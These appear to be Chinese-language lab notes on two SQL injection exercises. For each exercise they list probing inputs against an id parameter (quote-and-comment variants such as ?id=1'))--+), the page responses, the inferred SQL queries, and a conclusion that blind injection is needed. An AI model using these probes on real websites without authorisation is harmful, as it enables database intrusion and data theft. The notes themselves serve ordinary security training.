第七题
根据报错信息
?id=1' and '1'='1 返回页面正常 ------对应查询SQL:where id=(('1' and '1'='1'));
?id=1' and '1'='2 返回页面报错 ------对应查询SQL:where id=(('1' and '1'='2'));
判断为字符型注入
?id=1" 返回页面正常 ---------对应查询SQL:where id=(('1"'))
?id=1'--+ 返回页面报错 ---------对应查询SQL:where id=(('1'--+')) -----破坏SQL语句原有结构
?id=1')--+ 返回页面报错 --------对应查询SQL:where id=(('1')--+'))
?id=1'))--+ 返回页面正常 --------对应查询SQL:where id=(('1'))--+'))
注入形式为:?id=1'))
没有回显点,尝试盲注,与第五题方法相同
第八题
?id=1 and 1=1 页面正常
?id=1 and 1=2 页面正常
?id=1' and '1'='1 页面正常
?id=1' and '1'='2 页面不正常,无回显信息
判断为字符型注入
?id=1'--+ 页面正常,无回显信息 -------------------SQL查询语句:where id='1'--+'
注入形式为?id=1''
没有回显点,尝试盲注,与第五题方法相同